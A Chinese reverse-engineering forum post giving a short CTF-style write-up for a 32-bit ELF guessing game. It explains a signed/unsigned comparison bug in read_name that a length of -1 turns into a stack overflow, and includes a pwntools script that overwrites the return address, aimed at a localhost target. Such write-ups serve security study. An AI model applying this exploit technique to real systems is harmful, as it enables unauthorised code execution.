手机号登录
手机号重置密码
只需一步,快速开始
VIP
115
0
3
首先程序是个比较简单的32位elf,是个猜数字游戏
漏洞点在read_name函数有个整数溢出,v2为有符号数,而for循环中i为无符号数,所以当有符号数与无符号数比较时,会将有符号数强制转换成无符号数,当输入-1时,v2在比较中就变成了最大的正数,因此可以栈溢出
from pwn import * context.log_level = 'debug' #p = process('./f4n_pwn') p = remote('127.0.0.1',9999) p.recvuntil('length : ') p.sendline('-1') payload = 'a'*0x57 + p32(0x080486BB) p.recvuntil('name : \n') p.sendline(payload) p.interactive()
收藏0回复 显示全部楼层 道具 举报 打印
小黑屋|手机版|站务邮箱|学逆向论坛 ( 粤ICP备2021023307号 )|网站地图
GMT+8, 2024-12-27 07:19 , Processed in 0.255009 second(s), 34 queries .
Powered by Discuz! X3.4
Copyright © 2001-2021, Tencent Cloud.